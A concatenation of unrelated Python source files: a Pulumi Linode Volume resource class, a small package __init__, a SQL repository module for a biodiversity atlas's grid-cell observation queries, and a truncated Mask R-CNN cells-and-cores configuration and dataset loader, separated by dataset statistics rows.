This resource exports the following attributes:
* `status` - The status of the Linode Volume. (`creating`, `active`, `resizing`, `contact_support`)
* `filesystem_path` - The full filesystem path for the Volume based on the Volume's label. The path is "/dev/disk/by-id/scsi-0Linode_Volume_" + the Volume label
## Import
Linode Volumes can be imported using the Linode Volume `id`, e.g.
```sh
$ pulumi import linode:index/volume:Volume myvolume 1234567
```
The Linode Guide, [Import Existing Infrastructure to Terraform](https://www.linode.com/docs/applications/configuration-management/import-existing-infrastructure-to-terraform/), offers resource importing examples for Block Storage Volumes and other Linode resource types.
:param str resource_name: The name of the resource.
:param VolumeArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(VolumeArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
label: Optional[pulumi.Input[str]] = None,
linode_id: Optional[pulumi.Input[int]] = None,
region: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = VolumeArgs.__new__(VolumeArgs)
if label is None and not opts.urn:
raise TypeError("Missing required property 'label'")
__props__.__dict__["label"] = label
__props__.__dict__["linode_id"] = linode_id
if region is None and not opts.urn:
raise TypeError("Missing required property 'region'")
__props__.__dict__["region"] = region
__props__.__dict__["size"] = size
__props__.__dict__["tags"] = tags
__props__.__dict__["filesystem_path"] = None
__props__.__dict__["status"] = None
super(Volume, __self__).__init__(
'linode:index/volume:Volume',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
filesystem_path: Optional[pulumi.Input[str]] = None,
label: Optional[pulumi.Input[str]] = None,
linode_id: Optional[pulumi.Input[int]] = None,
region: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[int]] = None,
status: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None) -> 'Volume':
"""
Get an existing Volume resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] filesystem_path: The full filesystem path for the Volume based on the Volume's label. Path is /dev/disk/by-id/scsi-0Linode_Volume_ +
Volume label.
:param pulumi.Input[str] label: The label of the Linode Volume
:param pulumi.Input[int] linode_id: The ID of a Linode Instance where the Volume should be attached.
:param pulumi.Input[str] region: The region where this volume will be deployed. Examples are `"us-east"`, `"us-west"`, `"ap-south"`, etc. See all regions [here](https://api.linode.com/v4/regions). *Changing `region` forces the creation of a new Linode Volume.*.
:param pulumi.Input[int] size: Size of the Volume in GB.
:param pulumi.Input[str] status: The status of the volume, indicating the current readiness state.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A list of tags applied to this object. Tags are for organizational purposes only.
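Example (illustrative sketch; the volume ID is a placeholder)::

import pulumi_linode as linode

volume = linode.Volume.get("imported-volume", "1234567")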
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _VolumeState.__new__(_VolumeState)
__props__.__dict__["filesystem_path"] = filesystem_path
__props__.__dict__["label"] = label
__props__.__dict__["linode_id"] = linode_id
__props__.__dict__["region"] = region
__props__.__dict__["size"] = size
__props__.__dict__["status"] = status
__props__.__dict__["tags"] = tags
return Volume(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="filesystemPath")
def filesystem_path(self) -> pulumi.Output[str]:
"""
The full filesystem path for the Volume based on the Volume's label. Path is /dev/disk/by-id/scsi-0Linode_Volume_ +
Volume label.
"""
return pulumi.get(self, "filesystem_path")
@property
@pulumi.getter
def label(self) -> pulumi.Output[str]:
"""
The label of the Linode Volume
"""
return pulumi.get(self, "label")
@property
@pulumi.getter(name="linodeId")
def linode_id(self) -> pulumi.Output[int]:
"""
The ID of a Linode Instance where the Volume should be attached.
"""
return pulumi.get(self, "linode_id")
@property
@pulumi.getter
def region(self) -> pulumi.Output[str]:
"""
The region where this volume will be deployed. Examples are `"us-east"`, `"us-west"`, `"ap-south"`, etc. See all regions [here](https://api.linode.com/v4/regions). *Changing `region` forces the creation of a new Linode Volume.*.
"""
return pulumi.get(self, "region")
@property
@pulumi.getter
def size(self) -> pulumi.Output[int]:
"""
Size of the Volume in GB.
"""
return pulumi.get(self, "size")
@property
@pulumi.getter
def status(self) -> pulumi.Output[str]:
"""
The status of the volume, indicating the current readiness state.
"""
return pulumi.get(self, "status")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A list of tags applied to this object. Tags are for organizational purposes only.
"""
return pulumi.get(self, "tags")
| 42.885214 | 318 | 0.62682 | 2,700 | 22,043 | 4.977037 | 0.095926 | 0.076946 | 0.055217 | 0.032743 | 0.867465 | 0.847448 | 0.821104 | 0.803468 | 0.799673 | 0.781143 | 0 | 0.003574 | 0.263848 | 22,043 | 513 | 319 | 42.968811 | 0.824552 | 0.462505 | 0 | 0.668067 | 1 | 0 | 0.068102 | 0.002522 | 0 | 0 | 0 | 0 | 0 | 1 | 0.159664 | false | 0.004202 | 0.021008 | 0 | 0.277311 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b66383d14192d4ee1ec486595d3939646fe1688b | 123 | py | Python | S5_HumanPoseEstimation/src/__init__.py | EVA4-RS-Group/Phase2 | 7c551e3894979cc425dd51baeddbfa5a51b7878d | [
"Apache-2.0"
] | null | null | null | S5_HumanPoseEstimation/src/__init__.py | EVA4-RS-Group/Phase2 | 7c551e3894979cc425dd51baeddbfa5a51b7878d | [
"Apache-2.0"
] | null | null | null | S5_HumanPoseEstimation/src/__init__.py | EVA4-RS-Group/Phase2 | 7c551e3894979cc425dd51baeddbfa5a51b7878d | [
"Apache-2.0"
] | 2 | 2020-08-26T02:33:33.000Z | 2021-03-16T10:51:40.000Z | from .config import *
from .inference import *
from .inference_onnx import *
from .pose_resnet import *
from .loss import * | 24.6 | 29 | 0.764228 | 17 | 123 | 5.411765 | 0.470588 | 0.434783 | 0.413043 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.154472 | 123 | 5 | 30 | 24.6 | 0.884615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
1e33d8d011c6d736a3545d4965716342cd10d0cd | 19,835 | py | Python | main/modeles/repositories/vmObservationsMaillesRepository.py | Splendens/atlas_biodiv_pdl | eff4bcc9193b76462ede0365b9faec3e0706d5d8 | [
"BSD-2-Clause"
] | 3 | 2018-07-31T14:30:18.000Z | 2020-11-21T06:43:18.000Z | main/modeles/repositories/vmObservationsMaillesRepository.py | Splendens/atlas_biodiv_pdl | eff4bcc9193b76462ede0365b9faec3e0706d5d8 | [
"BSD-2-Clause"
] | null | null | null | main/modeles/repositories/vmObservationsMaillesRepository.py | Splendens/atlas_biodiv_pdl | eff4bcc9193b76462ede0365b9faec3e0706d5d8 | [
"BSD-2-Clause"
] | 2 | 2018-11-23T10:00:30.000Z | 2018-11-23T22:33:11.000Z |
# -*- coding:utf-8 -*-
from .. import utils
from sqlalchemy.sql import text
from main.configuration import config
import ast
def getObservationsMaillesChilds(connection, cd_ref):
    """Return per-grid-cell (maille) observations for a taxon and all of its child taxa."""
if config.GROS_JEU_DONNEES:
sql = """SELECT
obs.id_maille,
obs.geojson_maille,
a.nom_organisme AS orgaobs,
count(obs.id_observation) as nbobs,
max(extract(year from dateobs)) as annee
FROM atlas.vm_observations_mailles obs
JOIN atlas.vm_observations o ON o.id_observation = obs.id_observation
JOIN atlas.vm_organismes a ON a.id_organisme = o.id_organisme
WHERE obs.cd_ref in (
SELECT * FROM atlas.find_all_taxons_childs(:thiscdref)
)
OR obs.cd_ref = :thiscdref
GROUP BY
obs.id_maille,
obs.geojson_maille,
a.nom_organisme
ORDER BY obs.id_maille"""
else:
sql = """SELECT
obs.id_maille,
obs.geojson_maille,
a.nom_organisme AS orgaobs,
o.dateobs,
extract(YEAR FROM o.dateobs) as annee
FROM atlas.vm_observations_mailles obs
JOIN atlas.vm_observations o ON o.id_observation = obs.id_observation
JOIN atlas.vm_organismes a ON a.id_organisme = o.id_organisme
WHERE obs.cd_ref in (
SELECT * FROM atlas.find_all_taxons_childs(:thiscdref)
)
OR obs.cd_ref = :thiscdref
ORDER BY id_maille"""
observations = connection.execute(text(sql), thiscdref=cd_ref)
tabObs = list()
if config.GROS_JEU_DONNEES:
for o in observations:
temp = {
'id_maille': o.id_maille,
'nb_observations': o.nbobs,
'annee': o.annee,
'dateobs': None,
'orga_obs': o.orgaobs,
'geojson_maille': ast.literal_eval(o.geojson_maille)
}
tabObs.append(temp)
else:
for o in observations:
temp = {
'id_maille': o.id_maille,
'nb_observations': 1,
'annee': o.annee,
'dateobs': str(o.dateobs),
'orga_obs': o.orgaobs,
'geojson_maille': ast.literal_eval(o.geojson_maille)
}
tabObs.append(temp)
return tabObs
def pressionProspectionCommune(connection, insee):
    """Return per-grid-cell sampling effort for a municipality (INSEE code)."""
if config.GROS_JEU_DONNEES:
sql = """SELECT
obs.id_maille,
obs.geojson_maille,
a.nom_organisme AS orgaobs,
count(obs.id_observation) as nbobs,
max(extract(year from dateobs)) as annee
FROM atlas.vm_observations_mailles obs
JOIN atlas.vm_observations o ON o.id_observation = obs.id_observation
JOIN atlas.vm_taxons t ON t.cd_ref=o.cd_ref
JOIN atlas.vm_organismes a ON a.id_organisme = o.id_organisme
WHERE o.insee = :thisInsee
GROUP BY
obs.id_maille,
obs.geojson_maille,
a.nom_organisme
ORDER BY obs.id_maille"""
else:
sql = """SELECT
obs.id_maille,
obs.geojson_maille,
a.nom_organisme AS orgaobs,
o.dateobs,
extract(YEAR FROM o.dateobs) as annee
FROM atlas.vm_observations_mailles obs
JOIN atlas.vm_observations o ON o.id_observation = obs.id_observation
JOIN atlas.vm_taxons t ON t.cd_ref=o.cd_ref
JOIN atlas.vm_organismes a ON a.id_organisme = o.id_organisme
WHERE o.insee = :thisInsee
ORDER BY id_maille"""
observations = connection.execute(text(sql), thisInsee=insee)
tabObs = list()
if config.GROS_JEU_DONNEES:
for o in observations:
temp = {
'id_maille': o.id_maille,
'nb_observations': o.nbobs,
'annee': o.annee,
'dateobs': None,
'orga_obs': o.orgaobs,
'geojson_maille': ast.literal_eval(o.geojson_maille)
}
tabObs.append(temp)
else:
for o in observations:
temp = {
'id_maille': o.id_maille,
'nb_observations': 1,
'annee': o.annee,
'dateobs': str(o.dateobs),
'orga_obs': o.orgaobs,
'geojson_maille': ast.literal_eval(o.geojson_maille)
}
tabObs.append(temp)
return tabObs
# Latest observations (with media) for the home page (index.html)
def lastObservationsMailles(connection, mylimit, idPhoto):
    """Return recent observations joined to their grid cell, taxon and photo."""
sql = """
SELECT obs.*,
tax.lb_nom, tax.nom_vern, tax.group2_inpn,
o.dateobs, o.altitude_retenue,
medias.url, medias.chemin, medias.id_media
FROM atlas.vm_observations_mailles obs
JOIN atlas.vm_taxons tax ON tax.cd_ref = obs.cd_ref
JOIN atlas.vm_observations o ON o.id_observation=obs.id_observation
LEFT JOIN atlas.vm_medias medias
ON medias.cd_ref = obs.cd_ref AND medias.id_type = :thisID
WHERE o.dateobs >= (CURRENT_TIMESTAMP - INTERVAL :thislimit)
ORDER BY o.dateobs DESC
"""
observations = connection.execute(
text(sql),
thislimit=mylimit,
thisID=idPhoto
)
obsList = list()
for o in observations:
if o.nom_vern:
inter = o.nom_vern.split(',')
taxon = inter[0] + ' | ' + o.lb_nom
else:
taxon = o.lb_nom
temp = {
'id_observation': o.id_observation,
'id_maille': o.id_maille,
'cd_ref': o.cd_ref,
'dateobs': str(o.dateobs),
'altitude_retenue': o.altitude_retenue,
'taxon': taxon,
'geojson_maille': ast.literal_eval(o.geojson_maille),
'group2_inpn': utils.deleteAccent(o.group2_inpn),
'pathImg': utils.findPath(o),
'id_media': o.id_media
}
obsList.append(temp)
return obsList
def lastObservationsCommuneMaille(connection, mylimit, insee):
    """Return the grid cells intersecting the latest observations of a municipality."""
sql = """
WITH last_obs AS (
SELECT
obs.cd_ref, obs.dateobs, t.lb_nom,
t.nom_vern, obs.the_geom_point as l_geom
FROM atlas.vm_observations obs
JOIN atlas.vm_communes c
/*ON ST_Intersects(obs.the_geom_point, c.the_geom)*/
ON obs.insee = c.insee
JOIN atlas.vm_taxons t
ON obs.cd_ref = t.cd_ref
WHERE c.insee = :thisInsee
ORDER BY obs.dateobs DESC
LIMIT :thislimit
)
SELECT l.lb_nom, l.nom_vern, l.cd_ref, m.id_maille, m.geojson_maille
FROM atlas.t_mailles_territoire m
JOIN last_obs l
ON st_intersects(l.l_geom, m.the_geom)
GROUP BY l.lb_nom, l.cd_ref, m.id_maille, l.nom_vern, m.geojson_maille
"""
observations = connection.execute(
text(sql), thisInsee=insee, thislimit=mylimit
)
obsList = list()
for o in observations:
if o.nom_vern:
taxon = o.nom_vern + ' | ' + o.lb_nom
else:
taxon = o.lb_nom
temp = {
'cd_ref': o.cd_ref,
'taxon': taxon,
'geojson_maille': ast.literal_eval(o.geojson_maille),
'id_maille': o.id_maille
}
obsList.append(temp)
return obsList
# Used by the API
def getObservationsTaxonCommuneMaille(connection, insee, cd_ref):
    """Return per-grid-cell observations of a taxon within a municipality."""
sql = """
SELECT
o.cd_ref, t.id_maille, t.geojson_maille,
extract(YEAR FROM o.dateobs) as annee,
a.nom_organisme AS orgaobs
FROM atlas.vm_observations o
JOIN atlas.vm_communes c
/*ON ST_INTERSECTS(o.the_geom_point, c.the_geom)*/
ON o.insee = c.insee
JOIN atlas.t_mailles_territoire t
ON ST_INTERSECTS(t.the_geom, o.the_geom_point)
LEFT JOIN atlas.vm_organismes a
ON a.id_organisme = o.id_organisme
WHERE o.cd_ref = :thiscdref AND c.insee = :thisInsee
ORDER BY id_maille
"""
observations = connection.execute(
text(sql), thisInsee=insee, thiscdref=cd_ref
)
tabObs = list()
for o in observations:
temp = {
'id_maille': o.id_maille,
'nb_observations': 1,
'annee': o.annee,
'orga_obs': o.orgaobs,
'geojson_maille': ast.literal_eval(o.geojson_maille)
}
tabObs.append(temp)
return tabObs
def lastObservationsEpciMaille(connection, mylimit, nom_epci_simple):
    """Return the grid cells intersecting the latest observations of an EPCI (inter-municipal grouping)."""
sql = """
WITH last_obs AS (
SELECT
obs.cd_ref, obs.dateobs, t.lb_nom,
t.nom_vern, obs.the_geom_point as l_geom
FROM atlas.vm_observations obs
JOIN atlas.vm_communes c
/*ON ST_Intersects(obs.the_geom_point, c.the_geom)*/
ON obs.insee = c.insee
JOIN atlas.vm_taxons t ON obs.cd_ref = t.cd_ref
JOIN atlas.l_communes_epci ec ON ec.insee = obs.insee
JOIN atlas.vm_epci e ON ec.id = e.id
WHERE e.nom_epci_simple = :thisNomEpciSimple
ORDER BY obs.dateobs DESC
LIMIT :thislimit
)
SELECT l.lb_nom, l.nom_vern, l.cd_ref, m.id_maille, m.geojson_maille
FROM atlas.t_mailles_territoire m
JOIN last_obs l
ON st_intersects(l.l_geom, m.the_geom)
GROUP BY l.lb_nom, l.cd_ref, m.id_maille, l.nom_vern
"""
observations = connection.execute(
text(sql), thisNomEpciSimple=nom_epci_simple, thislimit=mylimit
)
obsList = list()
for o in observations:
if o.nom_vern:
taxon = o.nom_vern + ' | ' + o.lb_nom
else:
taxon = o.lb_nom
temp = {
'cd_ref': o.cd_ref,
'taxon': taxon,
'geojson_maille': ast.literal_eval(o.geojson_maille),
'id_maille': o.id_maille
}
obsList.append(temp)
return obsList
def pressionProspectionEpci(connection, nom_epci_simple):
    """Return per-grid-cell sampling effort for an EPCI (inter-municipal grouping)."""
if config.GROS_JEU_DONNEES:
sql = """SELECT
obs.id_maille,
obs.geojson_maille,
a.nom_organisme AS orgaobs,
count(obs.id_observation) as nbobs,
max(extract(year from dateobs)) as annee
FROM atlas.vm_observations_mailles obs
JOIN atlas.vm_observations o ON o.id_observation = obs.id_observation
JOIN atlas.vm_taxons t ON t.cd_ref=o.cd_ref
JOIN atlas.l_communes_epci ec ON ec.insee = o.insee
JOIN atlas.vm_epci e ON ec.id = e.id
JOIN atlas.vm_organismes a ON a.id_organisme = o.id_organisme
WHERE e.nom_epci_simple = :thisNomEpciSimple
GROUP BY
obs.id_maille,
obs.geojson_maille,
a.nom_organisme
ORDER BY obs.id_maille"""
else:
sql = """SELECT
obs.id_maille,
obs.geojson_maille,
a.nom_organisme AS orgaobs,
o.dateobs,
extract(YEAR FROM o.dateobs) as annee
FROM atlas.vm_observations_mailles obs
JOIN atlas.vm_observations o ON o.id_observation = obs.id_observation
JOIN atlas.vm_taxons t ON t.cd_ref=o.cd_ref
JOIN atlas.l_communes_epci ec ON ec.insee = o.insee
JOIN atlas.vm_epci e ON ec.id = e.id
JOIN atlas.vm_organismes a ON a.id_organisme = o.id_organisme
WHERE e.nom_epci_simple = :thisNomEpciSimple
ORDER BY id_maille"""
observations = connection.execute(text(sql), thisNomEpciSimple=nom_epci_simple)
tabObs = list()
if config.GROS_JEU_DONNEES:
for o in observations:
temp = {
'id_maille': o.id_maille,
'nb_observations': o.nbobs,
'annee': o.annee,
'dateobs': None,
'orga_obs': o.orgaobs,
'geojson_maille': ast.literal_eval(o.geojson_maille)
}
tabObs.append(temp)
else:
for o in observations:
temp = {
'id_maille': o.id_maille,
'nb_observations': 1,
'annee': o.annee,
'dateobs': str(o.dateobs),
'orga_obs': o.orgaobs,
'geojson_maille': ast.literal_eval(o.geojson_maille)
}
tabObs.append(temp)
return tabObs
def lastObservationsDptMaille(connection, mylimit, num_dpt):
    """Return the grid cells intersecting the latest observations of a department."""
sql = """
WITH last_obs AS (
SELECT
obs.cd_ref, obs.dateobs, t.lb_nom,
t.nom_vern, obs.the_geom_point as l_geom
FROM atlas.vm_observations obs
JOIN atlas.vm_communes c
/*ON ST_Intersects(obs.the_geom_point, c.the_geom)*/
ON obs.insee = c.insee
JOIN atlas.vm_taxons t ON obs.cd_ref = t.cd_ref
WHERE left(obs.insee,2)::int = :thisNumdpt
ORDER BY obs.dateobs DESC
LIMIT :thislimit
)
SELECT l.lb_nom, l.nom_vern, l.cd_ref, m.id_maille, m.geojson_maille
FROM atlas.t_mailles_territoire m
JOIN last_obs l
ON st_intersects(l.l_geom, m.the_geom)
GROUP BY l.lb_nom, l.cd_ref, m.id_maille, l.nom_vern, m.geojson_maille
"""
observations = connection.execute(
text(sql), thisNumdpt=num_dpt, thislimit=mylimit
)
obsList = list()
for o in observations:
if o.nom_vern:
taxon = o.nom_vern + ' | ' + o.lb_nom
else:
taxon = o.lb_nom
temp = {
'cd_ref': o.cd_ref,
'taxon': taxon,
'geojson_maille': ast.literal_eval(o.geojson_maille),
'id_maille': o.id_maille
}
obsList.append(temp)
return obsList
def lastObservationsDptMaille10(connection, mylimit, num_dpt):
    """Same as lastObservationsDptMaille, but on the 10x10 km grid (t_mailles_10_territoire)."""
sql = """
WITH last_obs AS (
SELECT
obs.cd_ref, obs.dateobs, t.lb_nom,
t.nom_vern, obs.the_geom_point as l_geom
FROM atlas.vm_observations obs
JOIN atlas.vm_communes c
/*ON ST_Intersects(obs.the_geom_point, c.the_geom)*/
ON obs.insee = c.insee
JOIN atlas.vm_taxons t ON obs.cd_ref = t.cd_ref
WHERE left(obs.insee,2)::int = :thisNumdpt
ORDER BY obs.dateobs DESC
LIMIT :thislimit
)
SELECT l.lb_nom, l.nom_vern, l.cd_ref, m.id_maille, m.geojson_maille
FROM atlas.t_mailles_10_territoire m
JOIN last_obs l
ON st_intersects(l.l_geom, m.the_geom)
GROUP BY l.lb_nom, l.cd_ref, m.id_maille, l.nom_vern, m.geojson_maille
"""
observations = connection.execute(
text(sql), thisNumdpt=num_dpt, thislimit=mylimit
)
obsList = list()
for o in observations:
if o.nom_vern:
taxon = o.nom_vern + ' | ' + o.lb_nom
else:
taxon = o.lb_nom
temp = {
'cd_ref': o.cd_ref,
'taxon': taxon,
'geojson_maille': ast.literal_eval(o.geojson_maille),
'id_maille': o.id_maille
}
obsList.append(temp)
return obsList
def pressionProspectionDpt(connection, num_dpt):
    """Return per-grid-cell sampling effort for a department."""
if config.GROS_JEU_DONNEES:
sql = """SELECT
obs.id_maille,
obs.geojson_maille,
a.nom_organisme AS orgaobs,
count(obs.id_observation) as nbobs,
max(extract(year from dateobs)) as annee
FROM atlas.vm_observations_mailles obs
JOIN atlas.vm_observations o ON o.id_observation = obs.id_observation
JOIN atlas.vm_taxons t ON t.cd_ref=o.cd_ref
JOIN atlas.vm_organismes a ON a.id_organisme = o.id_organisme
WHERE left(o.insee,2)::int = :thisNumdpt
GROUP BY
obs.id_maille,
obs.geojson_maille,
a.nom_organisme
ORDER BY obs.id_maille"""
else:
sql = """SELECT
obs.id_maille,
obs.geojson_maille,
a.nom_organisme AS orgaobs,
o.dateobs,
extract(YEAR FROM o.dateobs) as annee
FROM atlas.vm_observations_mailles obs
JOIN atlas.vm_observations o ON o.id_observation = obs.id_observation
JOIN atlas.vm_taxons t ON t.cd_ref=o.cd_ref
JOIN atlas.vm_organismes a ON a.id_organisme = o.id_organisme
WHERE left(o.insee,2)::int = :thisNumdpt
ORDER BY id_maille"""
observations = connection.execute(text(sql), thisNumdpt=num_dpt)
tabObs = list()
if config.GROS_JEU_DONNEES:
for o in observations:
temp = {
'id_maille': o.id_maille,
'nb_observations': o.nbobs,
'annee': o.annee,
'dateobs': None,
'orga_obs': o.orgaobs,
'geojson_maille': ast.literal_eval(o.geojson_maille)
}
tabObs.append(temp)
else:
for o in observations:
temp = {
'id_maille': o.id_maille,
'nb_observations': 1,
'annee': o.annee,
'dateobs': str(o.dateobs),
'orga_obs': o.orgaobs,
'geojson_maille': ast.literal_eval(o.geojson_maille)
}
tabObs.append(temp)
return tabObs
def pressionProspectionDpt10(connection, num_dpt):
    """Same as pressionProspectionDpt, but on the 10x10 km grid (vm_observations_mailles_10)."""
if config.GROS_JEU_DONNEES:
sql = """SELECT
obs.id_maille,
obs.geojson_maille,
a.nom_organisme AS orgaobs,
count(obs.id_observation) as nbobs,
max(extract(year from dateobs)) as annee
FROM atlas.vm_observations_mailles_10 obs
JOIN atlas.vm_observations o ON o.id_observation = obs.id_observation
JOIN atlas.vm_taxons t ON t.cd_ref=o.cd_ref
JOIN atlas.vm_organismes a ON a.id_organisme = o.id_organisme
WHERE left(o.insee,2)::int = :thisNumdpt
GROUP BY
obs.id_maille,
obs.geojson_maille,
a.nom_organisme
ORDER BY obs.id_maille"""
else:
sql = """SELECT
obs.id_maille,
obs.geojson_maille,
a.nom_organisme AS orgaobs,
o.dateobs,
extract(YEAR FROM o.dateobs) as annee
FROM atlas.vm_observations_mailles_10 obs
JOIN atlas.vm_observations o ON o.id_observation = obs.id_observation
JOIN atlas.vm_taxons t ON t.cd_ref=o.cd_ref
JOIN atlas.vm_organismes a ON a.id_organisme = o.id_organisme
WHERE left(o.insee,2)::int = :thisNumdpt
ORDER BY id_maille"""
observations = connection.execute(text(sql), thisNumdpt=num_dpt)
tabObs = list()
if config.GROS_JEU_DONNEES:
for o in observations:
temp = {
'id_maille': o.id_maille,
'nb_observations': o.nbobs,
'annee': o.annee,
'dateobs': None,
'orga_obs': o.orgaobs,
'geojson_maille': ast.literal_eval(o.geojson_maille)
}
tabObs.append(temp)
else:
for o in observations:
temp = {
'id_maille': o.id_maille,
'nb_observations': 1,
'annee': o.annee,
'dateobs': str(o.dateobs),
'orga_obs': o.orgaobs,
'geojson_maille': ast.literal_eval(o.geojson_maille)
}
tabObs.append(temp)
return tabObs
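# A minimal usage sketch (assumes a SQLAlchemy engine configured for the atlas
# database; the cd_ref and department number below are hypothetical):
#
#   from sqlalchemy import create_engine
#
#   engine = create_engine(config.DATABASE_CONNECTION)
#   with engine.connect() as connection:
#       mailles = getObservationsMaillesChilds(connection, cd_ref=12345)
#       effort = pressionProspectionDpt(connection, num_dpt=44)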
| 34.022298 | 83 | 0.564709 | 2,480 | 19,835 | 4.299597 | 0.058468 | 0.050267 | 0.045391 | 0.034512 | 0.891025 | 0.873582 | 0.870487 | 0.86561 | 0.857732 | 0.832692 | 0 | 0.002092 | 0.349332 | 19,835 | 582 | 84 | 34.080756 | 0.824113 | 0.003227 | 0 | 0.833977 | 0 | 0.005792 | 0.589729 | 0.071895 | 0 | 0 | 0 | 0 | 0 | 1 | 0.021236 | false | 0 | 0.007722 | 0 | 0.050193 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1e9276c6375b06cec4ed88f114eb96125805792e | 17,397 | py | Python | samples/cells_and_cores/cells_and_cores.py | umr-ds/feature_pyramid_fusion | 84053a1de74ee50f79e34fd4e2f75a5950797a9a | [
"MIT"
] | 6 | 2021-04-26T12:27:16.000Z | 2021-11-26T09:06:24.000Z | samples/cells_and_cores/cells_and_cores.py | umr-ds/feature_pyramid_fusion | 84053a1de74ee50f79e34fd4e2f75a5950797a9a | [
"MIT"
] | 1 | 2021-05-05T15:05:07.000Z | 2021-05-18T12:38:02.000Z | samples/cells_and_cores/cells_and_cores.py | umr-ds/feature_pyramid_fusion | 84053a1de74ee50f79e34fd4e2f75a5950797a9a | [
"MIT"
] | null | null | null | """
Mask R-CNN
Configurations and data loading code for cells and cores.
"""
############################################################
# Configurations
############################################################
import os
import sys
import skimage
from skimage.color import rgb2gray
import numpy as np
import pickle as pkl
import gzip
# Root directory of the project
ROOT_DIR = os.path.abspath("../../")
# Import Mask RCNN
sys.path.append(ROOT_DIR) # To find local version of the library
from mrcnn.config import Config
from mrcnn import utils
class CoresConfig(Config):
MASK_SHAPE = [28, 28]
LOSS_WEIGHTS = {
"rpn_class_loss": 1.,
"rpn_bbox_loss": 2.,
"mrcnn_class_loss": 1.,
"mrcnn_bbox_loss": 2.,
"mrcnn_mask_loss": 2.
}
CORE_SUFFIX = "_core" # Suffix for parameters/layer for core model
MEAN_PIXEL = [ 112.5 ]
USE_CORE_FEATURES = False # Train only cores
NAME = "cores"
    # Train on 1 GPU with 2 images per GPU. We can put multiple images on each
    # GPU because the images are small. Batch size is GPUs * images/GPU.
GPU_COUNT = 1
IMAGES_PER_GPU = 2
BACKBONE = "resnet50"
# Number of classes (including background)
NUM_CLASSES = 1 + 1 # background + one class
RPN_ANCHOR_SCALES = (32, 64, 128, 256, 512)
USE_MINI_MASK = False
POST_NMS_ROIS_TRAINING = 1000
POST_NMS_ROIS_INFERENCE = 500
IMAGE_MIN_DIM = 512
IMAGE_MAX_DIM = 512
IMAGE_RESIZE_MODE = 'none'
STEPS_PER_EPOCH = 1000
DETECTION_MAX_INSTANCES = 200
class CellsConfig(CoresConfig):
    NAME = "cells"
class Cells2ChannelConfig(CellsConfig):
MEAN_PIXEL = [ 112.5 , 112.5 ]
NAME = "input_2channels"
INPUT_CHANNELS = 2
    # NO_IMAGE_SCALE = True  # enable when using an ImageNet-pretrained model, which expects unscaled inputs
class CellsAndCoresConfig(CoresConfig):
NAME = "cells_and_cores"
USE_CORE_FEATURES = True # Use features of core model in training
USE_BORDER_WEIGHTS = True
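# A minimal sketch of selecting a configuration (mrcnn's Config resolves the
# class attributes above at instantiation time):
#
#   config = CellsAndCoresConfig()
#   config.display()  # prints the resolved settings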
class CoresDataset(utils.Dataset):
"""Contains only cores
"""
FIXED_INPUT_SHAPE = False
def load_image(self, image_id):
"""Load the specified image and return a [H,W,1] Numpy array.
"""
# Load image
image = skimage.io.imread(self.image_info[image_id]['path'])
assert image.ndim == 2 # Grayscale required
image = np.reshape(image,list(image.shape)+[1])
return image
def load_image_vis(self, image_id):
"""Load the specified image and return a [H,W,3] Numpy array.
Do not convert to one channel array (for visualization)
"""
image = skimage.io.imread(self.image_info[image_id]['path'])
assert image.ndim == 2
return image
def load_data(self, dataset_dir, subset):
self.add_class("core", 1, "core")
self.dataset_dir = dataset_dir
self.subset = subset
# Train or validation dataset?
assert subset in ["train", "val", "testeval", ""]
image_dir = os.path.join(dataset_dir,subset,"images")
for i,img_name in enumerate(next(os.walk(image_dir))[1]):
image_path = os.path.join(image_dir,img_name,"0.png")
if not self.FIXED_INPUT_SHAPE:
image = skimage.io.imread(image_path)
